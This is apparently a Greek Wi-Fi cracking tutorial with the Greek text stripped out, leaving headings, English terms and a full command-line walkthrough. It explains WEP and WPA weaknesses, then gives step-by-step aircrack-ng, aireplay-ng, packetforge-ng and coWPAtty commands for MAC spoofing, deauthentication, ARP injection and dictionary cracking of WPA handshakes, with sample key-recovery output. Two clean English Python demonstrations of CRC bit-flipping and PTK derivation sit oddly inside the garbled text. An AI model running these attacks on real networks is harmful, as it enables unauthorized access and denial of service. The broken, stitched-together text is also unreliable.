Hacker , ,
, , Update server client.
patch critical , exploits , advisories
. , data loss.
' Hacker Cracker ,
Root Admin , ban
ADMHN
0_. qubix
1. 802.1
1.1. 802.1
1.2.
2.
2.1.
2.2.
a) symmetric key cryptography
b) hash algorithms
c) asymmetric key cryptography
3.
4. To WEP
4.1. ' WEP
4.2. WEP
4.3. WEP;
a) authentication
b) integrity protection
c) IVs
5. The empire strikes back - To WPA
5.1. WPA / WEP
5.2. 4-way handshake
6. WPA2 total recall
7.
7.1.Deauthentication
7.2.Fake authentication
7.3.Interactive packet replay
7.4.ARP request replay
7.5.KoreK chopchop
7.6.Fragmentation attack
7.7.Caffe-latte attack
8. hardware
8.1.aircrack-ng suite
8.2.kismet
8.3.wireshark
8.4.cowpatty
8.5.john the ripper
8.6.backtrack
8.7. hardware
9. WEP cracking
10.WEP cracking revisited
11. ...
12. WPA cracking
12.1. Recon Kismet
12.2. Passive Attack
12.3. Active Attack
12.4. Four-way Handshake
12.5. Crack
12.6. Crack
13. ...
14.
0_. qubix
3 :
- ,
copy paste *
-To crackers
wifi
*) , !
1. 802.1
802.1;
802.1 802.1 .
(authentication)
(supplicant) o , authenticator
( access point - AP) authentication server ( RADIUS server) .
To 802.1, wireless ,
supplicant authentication server. authenticator
, wireless access points
/ . servers, APs ,
. Access Point authentication server.
802.1 , EAP
(Extensible Authentication Protocol)
, PPP(Point-to-Point Protocol - DSL
authentication PPPoE -PPPover Ethernet-) LAN PoL (EAP
over LAN) EAP-TLS, PEAP, Kerberos V5
802.1 .
, 802.11 legacy 1997
.
2.4GHz ( 900MHz
GSM) data rate 1 2 Mbit/s .
2.4GHz , 1999 802.11a
5GHz, data rate
54Mbit/s. 5GHz
2.4GHz, ,
802.11a .
To 802.11b, data
rate 11Mbit/s. The data rate
(modulation - DSSS).
, wireless ,
(2.4GHz) bluetooth, ,
2003, 802.11g 2.4GHz
802.11a. 54Mbit/s data rate
hardware 802.11b 802.11a
21%. data rate, hardware
3 (dual-band -2.4 & 5GHz, tri-mode -802.11a &
802.11b/g).
2.4GHz, .11b
2004 802.11i wireless ,
WEP, , WPA.
(c-f, h, j) .
802.11n, MIMO
(Multiple In-Multiple Out), , 2,3 4
, data streams
. 600Mbit/s bitrate
2.4 5GHz 802.11a/g (OFDM - Orthogonal
frequency-division multiplexing).
2.
(plaintext cleartext)
(cipher)
(key) ,
.
(ciphertext).
2 , (symmetric-key cryptography)
(public-key cryptography).
Symmetric-key cryptography
.
, ,
cipher plaintext. stream cipher RC4,
SSL, RDP, SASL, Kerberos, TLS WEP WPA.
hash, plaintext
plaintext .
hash MD5 SHA.
public-key cryptography ( asymmetric-key)
symmetric-key ,
, key ciphertext
.
.
public-key keys, private
ciphertext public plaintext.
,
. asymmetric key DSA, RSA, ElGamal o
PGP OpenPGP.
3.
,
...
AP (Access Point), Wi-Fi
Ad Hoc (Mode)
, AP
ARP (Address Resolution Protocol), IP MAC.
Association
( authentication)
Authentication (supplicant),
.
Authenticator
( AP).
Beacon AP
ESSID, MAC address
BSSID (Basic Service Set Identifier), MAC access point.
CCMP (Counter-Mode / Cipher Block Chaining Message Authentication Code Protocol),
WPA2, AES block cipher.
Channel , 1hz 5Mhz
Wi-Fi .
CRC (Cyclic Redundancy Check), pseudo-integrity
.
Dictionary ( xP) bruteforce attack
Dynamic WEP WEP : broadcast key
( shared key ) session key authenticated
supplicant. .
EAP (Extensible Authentication Protocol),
authentication.
EAPOL (EAP Over LAN), EAP .
ESSID (Extended Service Set Identifier),
Fragmentation
.
Frame frame packet. O
layer 2 OSI model frames,
3 layer packets ( OSI model )
GEK (Group Encryption Key), multicast traffic (
-integrity- CCMP).
GIK (Group Integrity Key), multicast traffic (TKIP).
GMK (Group Master Key), group key hierarchy.
GTK (Group Transient Key), GMK.
Handshake - supplicant
ICV (Integrity Check Value), data field plaintext
( CRC32 ).
Infrastructure (Mode) AP
.
IP address (Internet Protocol address)
.
IV (Initialization Vector), encryption key
keystream.
KCK (Key Confirmation Key), handshake.
KEK (Key Encryption Key), handshake .
MAC address (Media Access Control address), 48-bit
.
MIC (Message Integrity Code), data field plaintext
( Michael).
MK (Master Key), supplicant authenticator
authentication 802.1x.
Monitor Mode wifi
wifi . raw mode.
MPDU (Mac Protocol Data Unit), fragmentation.
MSDU (Mac Service Data Unit), fragmentation.
PAE (Port Access Entity), 802.1x.
packet () ()
. ,
"" .
4. WEP
' WEP
To WEP wireless 1999.
RC4 CRC32 integrity checking.
, ,
40-bit ,
104-bit . WEP
WPA/WPA2,
. , routers .
WEP
-
WEP . 24-bit IV (K)
RC4 plaintext (P) checksum
(ICV), ciphertext (C):
, :
802.11 header
BSS ID
Initialization vector (IV)
Destination address
(unencrypted)
Logical Link Control
Subnetwork Access Protocol Header
Data
Integrity Check Value
Authentication
association, .
2
capture four-way handshake WEP key , .
WEP;
Authentication ()
, supplicant AP,
.
key.
attacker
.
client AP,
attacker, client, mac address .
key (
key AP),
client ( )
key. AP.
H .
WEP, : C = P XOR R, C
ciphertext, P plaintext ICV (P||ICV(P)) R
key IV RC4 (RC4(key||IV)). C
P, R C, P. O
IVs WEP IV client,
attacker, o R .
Integrity protection
To 2001 Borisov, Goldberg Wagner CRC CRC
bit-flipping attack. O CRC ICV plaintext,
.
ICV plaintext ,
. CRC
, XOR.
: CRC(X XOR Y) = CRC(X) XOR CRC(Y).
(flip) bits plaintext
ICV (forged packet), P
router.
WEP
. WEP
, ! WEP ...
. , , bit-flipping,
.
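To make the linearity argument concrete, here is an added example (it is not code from the page or from any tool the page names). It checks the CRC identity with zlib's CRC32, shows a WEP-style ICV still validating after the payload is changed through a mask that needs no knowledge of the payload or key, and shows that a keyed MAC (HMAC-SHA256, constructed key) rejects the same change. The payload, the mask and the key are constructed for the example.

```python
import hashlib
import hmac
import zlib


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crc_xor_identity_holds(x: bytes, y: bytes) -> bool:
    """The linearity the page states, CRC(X XOR Y) = CRC(X) XOR CRC(Y), holds exactly for the
    bare polynomial remainder. zlib's CRC32 adds an initial value and a final XOR, which for
    equal-length inputs only contributes the fixed term CRC(zeros); the structure is the same."""
    if len(x) != len(y):
        raise ValueError("identity is for equal-length inputs")
    return crc32(xor_bytes(x, y)) == crc32(x) ^ crc32(y) ^ crc32(bytes(len(x)))


def wep_style_frame(payload: bytes) -> bytes:
    """payload || ICV, with ICV = CRC32(payload) as in WEP. RC4 is left out on purpose: it
    XORs a keystream onto this whole block, and XOR commutes with everything below."""
    return payload + crc32(payload).to_bytes(4, "little")


def icv_ok(frame: bytes) -> bool:
    payload, icv = frame[:-4], frame[-4:]
    return crc32(payload) == int.from_bytes(icv, "little")


def apply_mask_with_icv_fixup(frame: bytes, mask: bytes) -> bytes:
    """The weakness described on the page: XOR `mask` into the payload and correct the ICV
    using only the linearity identity, i.e. without knowing the payload or any key."""
    if len(mask) != len(frame) - 4:
        raise ValueError("mask must cover the payload exactly")
    icv_delta = crc32(mask) ^ crc32(bytes(len(mask)))  # CRC(P^M) = CRC(P) ^ CRC(M) ^ CRC(0)
    return xor_bytes(frame, mask + icv_delta.to_bytes(4, "little"))


def mac_frame(key: bytes, payload: bytes) -> bytes:
    """The fix the page points at (the MIC in WPA; a keyed MAC in general): a tag that
    depends on a secret key is not linear, so no mask has a computable tag correction."""
    return payload + hmac.new(key, payload, hashlib.sha256).digest()[:16]


def mac_ok(key: bytes, frame: bytes) -> bool:
    payload, tag = frame[:-16], frame[-16:]
    return hmac.compare_digest(hmac.new(key, payload, hashlib.sha256).digest()[:16], tag)


# Constructed sample input: a short cleartext payload and a mask flipping one bit of it.
PAYLOAD = b"dst=10.0.0.1 port=80"
MASK = bytes([0] * 9 + [0x01] + [0] * (len(PAYLOAD) - 10))  # flips the low bit of byte 9
KEY = b"constructed-mac-key-0000"


def demo() -> dict:
    weak = wep_style_frame(PAYLOAD)
    weak_modified = apply_mask_with_icv_fixup(weak, MASK)
    strong = mac_frame(KEY, PAYLOAD)
    strong_modified = xor_bytes(strong, MASK + bytes(16))
    return {
        "crc_accepts_modified": icv_ok(weak_modified),         # True: CRC cannot tell
        "modified_payload": weak_modified[:-4],
        "mac_accepts_modified": mac_ok(KEY, strong_modified),  # False: keyed MAC rejects
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The CRC fix-up only needs the mask and its length, which is exactly why a CRC, encrypted or not, is a checksum and not an integrity check; any unkeyed linear function has the same problem, and the remedy is a keyed MAC computed over the whole frame.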
IVs
stream cipher plaintext
(keystream) . WEP IVs.
IV (24bits) IVs 17.
IV
. AP 11Mbps 1500 ,
IVs 5 :
, chopchop
WPA protected , , key
bruteforce dictionary based attacks 4-way handshake.
4-way handshake
WPA. To 802.11i RSN
4-way handshake supplicant authenticator, RSNA.
4 RSN(A) :
802.1X
RSN(A) &
4-way handshake ( 3 bullet 2
authentication server) :
PMK (*)
PTK
cipher
GTK
*) WPA-PSK mode, PMK = PSK.
H PTK :
PTK = PRF-X(PMK, "Pairwise key expansion", Min(AP_Mac, STA_Mac) || Max(AP_Mac, STA_Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce))
.. :
PRF-X: Pseudo Random Function
ANonce: AP
SNonce: o
STA_Mac, AP_Mac: mac addresses AP
PTK KCK (Key Confirmation Key), KEK
(Key Encryption Key) TK (Temporary Key). KCK MIC.
H PTK, , .
RSN ,
, WEP.
, 4-way handshake.
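The derivation above, carried through in code. This is an added example, not code from the page or from any tool it names. The AP and station MAC addresses and the two nonces are constructed; the PMK comes from the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE", which in WPA-PSK mode is the PSK and therefore the PMK). It goes one step beyond the page by also computing and checking the Key MIC that the KCK protects on handshake message 2, which is how the authenticator notices a wrong PMK or a modified frame.

```python
import hashlib
import hmac

# Constructed sample values (not from any real network): the AP and station MAC addresses
# and the two 32-byte nonces exchanged in handshake messages 1 and 2.
AP_MAC = bytes.fromhex("001122aabbcc")
STA_MAC = bytes.fromhex("00aabb112233")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK mode (PMK = PSK): PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID,
    4096 iterations, 32 bytes out. The SSID salt is why a precomputed table is per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    and truncate to `length` bytes (PRF-512 when length == 64)."""
    out = b""
    i = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     Min(AP_Mac, STA_Mac) || Max(AP_Mac, STA_Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce)).
    Min/Max compare the values as unsigned big-endian integers, which for equal-length byte
    strings is ordinary byte-string comparison, so both sides derive the same PTK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf(pmk, b"Pairwise key expansion", data, 64)
    # Split as on the page: KCK (MICs the handshake), KEK (wraps the GTK), TK (CCMP data key).
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48], "ptk": ptk}


MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the Key MIC


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes, descriptor_version: int = 2) -> bytes:
    """Key MIC over the entire EAPOL frame with the 16-byte MIC field set to zero.
    Descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) HMAC-SHA1 truncated to 16 bytes."""
    digest = hashlib.md5 if descriptor_version == 1 else hashlib.sha1
    return hmac.new(kck, frame_mic_zeroed, digest).digest()[:16]


def verify_eapol_mic(kck: bytes, frame: bytes, descriptor_version: int = 2) -> bool:
    """What the authenticator does with message 2: recompute the MIC with its own KCK and
    compare in constant time. A mismatch means a different PMK or a modified frame."""
    received = frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.compare_digest(received, eapol_mic(kck, zeroed, descriptor_version))


def build_message2(kck: bytes, snonce: bytes) -> bytes:
    """Constructed stand-in for handshake message 2 (supplicant -> authenticator) with the
    field layout of an EAPOL-Key frame; only the SNonce and MIC positions matter here."""
    header = bytes([0x02, 0x03, 0x00, 0x5F])          # 802.1X version 2, type 3 (EAPOL-Key), length 95
    body = bytes([0x02]) + b"\x01\x0A" + b"\x00\x10"  # descriptor type, key info, key length
    body += b"\x00" * 7 + b"\x01"                     # replay counter = 1
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, key IV, RSC, key ID
    frame = header + body + b"\x00" * 16 + b"\x00\x00"  # MIC (zeroed), key data length = 0
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


if __name__ == "__main__":
    pmk = pmk_from_passphrase("password", "IEEE")  # IEEE 802.11i Annex H test vector
    keys = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    msg2 = build_message2(keys["kck"], SNONCE)
    print("PMK   :", pmk.hex())
    print("KCK   :", keys["kck"].hex())
    print("MIC ok:", verify_eapol_mic(keys["kck"], msg2))
```

Two points the code makes visible: the Min/Max ordering means the result is the same whichever side computes it, and every byte of the PTK (hence the MIC on message 2) depends on both nonces, so a captured handshake plus a candidate passphrase is enough to test that candidate offline, which is the reason the page stresses passphrase strength.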
7.
Deauthentication
deauthentication clients
(reauthenticate).
clients DoS (Queensland DoS).
:
Fake authentication
clients associated
MAC address. WEP association
AP. ARP AP WPA/WPA2.
KoreK chopchop
, WEP
key, WEP key, plaintext PRGA
.
:
1)
2) byte (chop off)
3) 0,
4) AP
5) byte 1
256 ,
AP
6) byte
KoreK bit-flipping CRC32
ICV chopped off ICV
.
Fragmentation attack
1500 bytes PRGA,
injection attacks. ,
PRGA ,
PRGA .
fragmentation attack ( AP,
relay) .
, 8 bytes
802.11 LLC/SNAP header. 3 bytes
: AA, AA, 03 frame (
frame ). 3 bytes 00,00,00 IP
2 bytes. 2 bytes , IP ARP.
byte 08, IP ARP
, ARP 36 54 bytes.
:
byte.
0xAA 0xAA 0x03        (LLC)
0x00 0x00 0x00        (ORG code)
0x08 ??               (Ether type)
ARP
. ARP
. ..1500bytes
P . ,
ARP .
bytes .
. IV ,
bit-flipping
WEP ...
Caffe-latte attack
attacker AP
. caffe-latte , laptop
, cached WEP keys
attacker !
SSID spoofing evil twin/honeypot attacks
AP
clients wi-fi hotspots . attacker
AP ESSID connex
laptop WEP key man-in-the-middle
. attacker WEP key
. , ;
ARP pc
ip address. client ,
ip address .
ip . attacker
ARP requests . ARP
bit-flipping integrity checking WEP, P
MAC address header gratuitous ARP ,
ARP request .
o attacker , ARP
request, ip - -
. attacker WEP key.
8. hardware
X software
Aircrack-ng suite
wifi crackers, ,
mass deauthentication. :
aireplay-ng
, wifi
packet injection.
:
aireplay-ng <options> <replay interface>
Filter options:
-m len    : minimum packet length
-n len    : maximum packet length
-u type   : frame control, type field
-v subt   : frame control, subtype field
-t tods   : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep  : frame control, WEP bit
Replay options (packet injection):
-x nbpps  : number of packets per second
-p fctrl  : set frame control word (hex)
-a bssid  : set Access Point MAC address
-c dmac   : set Destination MAC address
-h smac   : set Source MAC address
-e essid  : set target AP SSID
-j        : arpreplay attack: inject FromDS packets
-g value  : change ring buffer size (default: 8)
-k IP     : set destination IP in fragments
-l IP     : set source IP in fragments
-o npckts : number of packets per burst (-1)
-q sec    : seconds between keep-alives (-1)
-y prga   : keystream for shared key auth
:
aireplay-ng -1 0 -e [ESSID] -a [BSSID of AP] -b [BSSID of AP] -h [MAC of station] [interface]
-1 = fakeauth
0 = delay AP
-e = AP authentication
-a = mac AP injection
-b = mac AP
-h = mac
interface = wlan interface , ath0
airmon-ng
airmon monitor mode
:
airmon-ng <start|stop> <interface> [channel]
:
airodump-ng
airodump raw . ,
AP GPS,
:
airodump-ng <options> <interface>[,<interface>,...]
:
--ivs                 : Save only captured IVs
--gpsd                : Use GPSd
--write    <prefix>   : Dump file prefix
-w                    : same as --write
--beacons             : Record all beacons in dump file
--update     <secs>   : Display update delay in seconds
--showack             : Prints ack/cts/rts statistics
-h                    : Hides known stations for --showack
-f          <msecs>   : Time in ms between hopping channels
--berlin     <secs>   : Time before removing the AP/client from the screen when no more packets are received (Default: 120 seconds)
-r           <file>   : Read packets from that file
Filter options:
--encrypt   <suite>   : Filter APs by cipher suite
--netmask <netmask>   : Filter APs by mask
--bssid     <bssid>   : Filter APs by BSSID
-a                    : Filter unassociated clients
aircrack-ng
aircrack cracking WEP WPA/WPA2-PSK keys.
WEP , PTW (Pyshkin, Tews, Weinmann) FMS/KoreK.
PTW
Andreas Klein (2005) o
RC4 keystreams Key FMS. ARP
.
FMS/KoreK WEP key:
WPA/WPA2 .
WPA/WPA2 shared key 4-way handshake client
AP dictionary attack handshake .
:
aircrack-ng [options] <capture file(s)>
Options:
-a  amode  : Force the attack mode: 1 or wep for WEP, 2 or wpa for WPA-PSK.
-e  essid  : If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA/WPA2-PSK cracking if the ESSID is not broadcasted (hidden).
-b  bssid  : Select the target network based on the access point's MAC address.
-p  nbcpu  : On SMP systems: number of CPUs to use.
-q  none   : Enable quiet mode (no status output until the key is found, or not).
-c  none   : (WEP) Restrict the search space to alpha-numeric characters only (0x20 - 0x7F).
-t  none   : (WEP) Restrict the search space to binary coded decimal hex characters.
-h  none   : (WEP) Restrict the search space to numeric characters (0x30-0x39). These keys are used by default in most Fritz!BOXes.
-d  start  : (WEP) Set the beginning of the WEP key (in hex), for debugging purposes.
-m  maddr  : (WEP) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network.
-n  nbits  : (WEP) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128.
-i  index  : (WEP) Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index.
-f  fudge  : (WEP) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.
-k  korek  : (WEP) There are 17 korek statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, -k 17 to disable each attack selectively.
-x/-x0 none : (WEP) Disable bruteforce of the last keybytes.
-x1 none   : (WEP) Enable last keybyte bruteforcing (default).
-x2 none   : (WEP) Enable last two keybytes bruteforcing.
-X  none   : (WEP) Disable bruteforce multithreading (SMP only).
-y  none   : (WEP) This is an experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs.
-w  words  : (WPA) Path to a wordlist, or "-" without the quotes for standard input (stdin).
-z  none   : Invokes the PTW WEP cracking method.
aircrack:
KB = Keybyte
depth = depth of the current key search
byte = byte the IVs leaked
vote = votes indicating this byte is correct
:
aircrack-ng -w h:hex.txt,ascii.txt -a 1 -n 64 -e apname wep10-01.cap
(wep dictionary attack)
-w h:hex.txt,ascii.txt = dictionaries ( h:
hex values)
-a 1 = WEP
-n 64 = 64bit
-e apname = AP (-b mac address )
wep10-01.cap =
packetforge-ng
O packetforge
injection. ARP requests,
UDP, ICMP custom . ARP request injection.
Forge options:
-p <fctrl> : set frame control word (hex)
-a <bssid> : set Access Point MAC address
-c <dmac> : set Destination MAC address
-h <smac> : set Source MAC address
-j : set FromDS bit
-o : clear ToDS bit
-e : disables WEP encryption
-k <ip[:port]> : set Destination IP [Port]
-l <ip[:port]> : set Source IP [Port] (Dash lowercase letter L)
-t ttl : set Time To Live
-w <file> : write packet to this pcap file
Modes (long modes use double dashes):
arp : forge an ARP packet (-0)
udp : forge an UDP packet (-1)
icmp : forge an ICMP packet (-2)
null : build a null packet (-3)
custom : build a custom packet (-9)
Kismet
Kismet (sniffing), intrusion
detection 802.11 wireless .
:
Wireshark/Tcpdump
Airsnort weak-iv packets
IP
channel hopping multicard split channel hopping
SSID
Client/Server client kismet server
/ APs clients
AP default
WEP packets realtime
Named pipe Snort
, Kismet instance
instances (remote drones)
XML output
20
, Kismet , , ,
APs clients .
, (channel hopping)
. ,
GPS.
Wardriving: Mobile detection of wireless networks, logging and mapping of network location, WEP,
etc.
Site survey: Monitoring and graphing signal strength and location.
Distributed IDS: Multiple Remote Drone sniffers distributed throughout an installation monitored by a
single server, possibly combined with a layer3 IDS like Snort.
Rogue AP Detection: Stationary or mobile sniffers to enforce site policy against rogue access points.
Kismet :
Interface:
- Name : SSID
- T : T
- W :
- Ch : AP
- Packts :
- Flags : IP (. A4 ARP )
- IP Range : IP
- Size : AP
:
W Y (Yes) WEP,
O (Other) (WPA/TKIP/LEAP/EAP/TLS). O ,
(Information) Encrypt
.
:
Kismet , .
:
- :
- : , factory default
- :
- :
:
- A Access Point
- H (Ad-Hoc) - ad-hoc point-to-point wireless
- P (Probe request) client ,
- D (Data) - Data network
- T (Turbocell) - Turbocell network
- G (Group) - Group ( )
:
e popup kismet servers
z - Zoom
m ( config)
t
g
u group
c popup clients
n group
i
s
l - signal/power/noise
r
a
p
f
w alerts warnings.
Wireshark
To wireshark ( ethereal)
, . ,
Pcap / . monitor mode (
promiscuous mode ethernet)
:
Windows, Linux, OS X, Solaris, FreeBSD, NetBSD
Live ( format)
Gui cli (TTY-mode TShark)
VoIP
capture formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure
IDS iplog, Microsoft Network Monitor, Network General Sniffer, Sniffer Pro, and NetXray, Network
Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer,
Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets
EtherPeek/TokenPeek/AiroPeek, .
/ Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth,
USB, Token Ring, Frame Relay, FDDI
IPsec, ISAKMP, Kerberos, SNMPv3,
SSL/TLS, WEP WPA/WPA2
Output XML, PostScript, CSV
coWPAtty
To coWPAtty bruteforce dictionary attack,
WPA/WPA2 handshakes.
Usage: cowpatty [options]
-f
-r
-s
-h
-v
-V
Dictionary file
Packet capture file
Network SSID
Print this help information and exit
Print verbose information (more -v for more verbosity)
Print program version and exit
: http://www.openwall.com/john/
BackTrack
To BackTrack live Linux, Slackware
penetration testing ( 300).
patched drivers , -
.
:
http://www.remote-exploit.org/backtrack.html
documentation:
http://wiki.remote-exploit.org
hardware
aircrack-ng . , wireless
chips :
chipset
driver
atheros
madwifi
Broadcom
bcm43xx
b43
b43
Centrino a/b/g
ipw2915/3945
4965AGN
Prism2/3
HostAP/wlan-ng
PrismGT FullMAC
prism54
Ralink
RTL8185
mac80211
RTL8187B/RTL8197
RTL8187
RTL8187L
Rtl8187,rtl8187b
TI (ACX100/ACX111)
ACX100/ACX111
drivers patching.
atheros chip SMC-EZconnect & Ezconnect2, Level One wc-0300, Netgear WAG511, D-Link DWL-G550,
Thinkpad 11a/b/g
:
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
9.WEP cracking
Injection attack
,
, WEP key
. chip atheros.
1) monitor mode [1]
modprobe ath_pci
modprobe ipwraw
2) mac address ( interface)
iwconfig
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:66 wifi0
3) interface monitor mode
airodump-ng ath0
AP :
ESSID: connex
mac: 00:21:21:21:21:21
channel: 6
5)
-h = mac
-e = essid P
ath0 = interface
7) AP
1) APs
airodump-ng ath0
AP channel = 7
2) monitor mode 7
airmon-ng stop ath0
airmon-ng start wifi0 7
3) association AP
aireplay-ng -1 0 -e [ESSID of AP] -a [mac AP] -h [mac ] ath0
-1 = Fake authentication AP
-e = essid ( AP)
-a = Mac address AP (bssid)
-h = mac address (source)
* Atheros chipsets MAC address
4) keystream aireplay-ng
aireplay-ng -5 -b [mac AP] -h [mac ] ath0
-5 = fragment: keystream
-b = AP mac address (bssid)
-h = mac address (source)
ath0 = wireless interface extension
5) ARP request packetforge-ng
packetforge-ng -0 -a [mac AP] -h [mac ] -k 255.255.255.255 -l 255.255.255.255 -y fragment-0206-131211.xor -w arp-request
-0 = ARP
-a = bssid
-h = mac
-k = set Destination IP
-l = set Source IP
-y = PRGA ( (4) )
-w = pcap
6) airodump-ng
airodump-ng -c 7 --bssid [mac AP] -w wep ath0
-c = AP
--bssid = mac AP
-w = date
ath0 = wireless interface extension
7) inject
aireplay-ng -2 -r arp-request ath0
8) WEP key
aircrack-ng -P 2 -b 00:18:F6:AC:11:13 wep*.cap
11. ...
traffic
, IVs .
injection AP
.
IVs,
keys
: -k N ( =1..17) -y. (. Aircrack )
fudge factor (-f) . default 2 ,
,
.
,
AP :P
12.WPA cracking
, , kismet
reconing, wireshark packet filtering, coWPAtty JtR dictionary attacks.
:
http://www.smallnetbuilder.com/content/view/30278/98/1/1/
...
!
Recon Kismet
Kismet (Backtrack > Radio Network Analysis > 80211 > Analyzer). H version 3
wizard wireless interface ( ).
,
/usr/local/etc/kismet.conf interface:
:
/usr/local/etc/kismet.conf -- Line 25:source=madwifing_g,wifi0,kis0
Kismet :
bt ~ # kismet
kismet , .
raw packets,
PSK, client AP.
interface.
.
kismet, h help menu
.
, ,
, default . W : None
("W"), WEP ("Y"), WPA ("O" Other). H Ch AP.
Packts Kismet AP.
.
clients AP,
handshake .
kismet autofit mode,
. highlight
enter. .
encryption scheme, BSSID clients AP.
c kismet clients.
clients Established ("E") To DS ("T") ( T ).
Passive Attack
, kismet,
, , kismet
. airodump-ng, kismet
, .
four-way handshake, airodump-ng ,
.
passive WPA-PSK attack :
Kismet
(: channel, "s" "c")
(highlight AP "L")
handshake
Active Attack
Kismet,
associated clients AP .
, deauthentication packets,
. four-way
handshake.
. association
( )
AP ,
monitor mode.
- VAP (Virtual Access Point):
airmon-ng stop ath0 ( atheros)
- , monitor mode
airmon-ng start wifi0
:
airodump-ng -w cap --channel 6 ath0
:
aireplay-ng --deauth 1 -a 00:18:E7:02:4C:E6 -c 00:13:CE:21:54:14 ath0
, client AP ()
(reauthentication). Kismet
deauthentication floods,
, , .
, airodump-ng
reauthentication event.
Four-way Handshake
authentication handshake,
Wireshark,
WPA handshake.
Wireshark (Backtrack > Privilege Escalation > Sniffers)
Kismet (Kismet-<date>.dump). H WPA four-way handshake Extensible Authentication
Protocol over LAN (EAPoL). Wireshark EAPoL ,
eapol [filter].
, client-AP-client-AP. handshake,
.
Crack
Wi-Fi Alliance WPA-PSK.
() bruteforce attacks,
...6 ( 948
6 1015). pc 35 hashes ,
...5 hash table 8 .
.
. hash (salted) SSID AP, hash
table 5 , APs
SSID. WPA key bruteforce ...
, passphrases
, hashes
. dictionary attack.
To BackTrack 2 , , ,
, ( passwords ).
Backtrack ,
.
, dictionary attack
WPA handshake aircrack-ng, coWPAtty. aircrack-ng .
coWPAtty hashes .
aircrack-ng attack
aircrack-ng -e AP_SID -w dictionary_file capture_file
(BackTrack v3):
aircrack-ng -e snb -w /pentest/wireless/cowpatty-4.0/dict Kismet-Jan-15-2008-1.dump
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
                 B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 CE FF 2B F8 8A 1D 20 BB 9D 41 90 F3 A0 E1 8C
                 B1 FC 65 EA 55 ED 17 32 AE A6 93 15 EE DE 0E A6
                 1F 70 64 26 66 84 32 62 AE BA BF 93 51 90 25 27
                 1F 83 50 66 F8 7E D5 66 12 CD 4A E0 98 40 5E 71
EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
aircrack-ng hashes ,
coWPAtty
coWPAtty , :
/pentest/wireless/cowpatty-4.0. Then run:
:
./cowpatty -s AP_SID -f dictionary_file -r capture_file
:
./cowpatty -s snb -f dict -r Kismet-Jan-15-2008-1.dump
:
./genpmk -s snb -f dict -d dict_hash
:
./cowpatty -s snb -d dict_hash -r Kismet-Jan-15-2008-1.dump
Crack
dictionary
. Passphrases dinosaur my wpa key coWPAtty
aircrack. dinosaur52 my Wp@ k3y;
dictionary bruteforce
, !
, ..
(*) (rules) cracking *NIX John the Ripper(JtR). ,
dictionary
input coWPAtty aircrack-ng on the fly. (*)
mangling (!!!)
aircrack-ng:
./john --wordlist=password_list --rules --stdout | aircrack-ng -e ssid -w - capture_file
:
./john --wordlist=password.lst --rules --stdout | aircrack-ng -e snb -w - Kismet-Jan-15-2008-1.dump
John set ,
documented "regex-esque" .
, default rules dictionary.
john.conf
section [List.Rules:Wordlist] ( 262) :
$[0-9]$[0-9]
$[0-9]$[0-9]$[0-9]
999
dictionary ( dinosaur52 )
. 3 1
:
sE3
sl1
sE3sl1
glid335 :
sE3$[0-9]
sE3$[0-9]$[0-9]
sE3$[0-9]$[0-9]$[0-9]
sl1$[0-9]
sl1$[0-9]$[0-9]
sl1$[0-9]$[0-9]$[0-9]
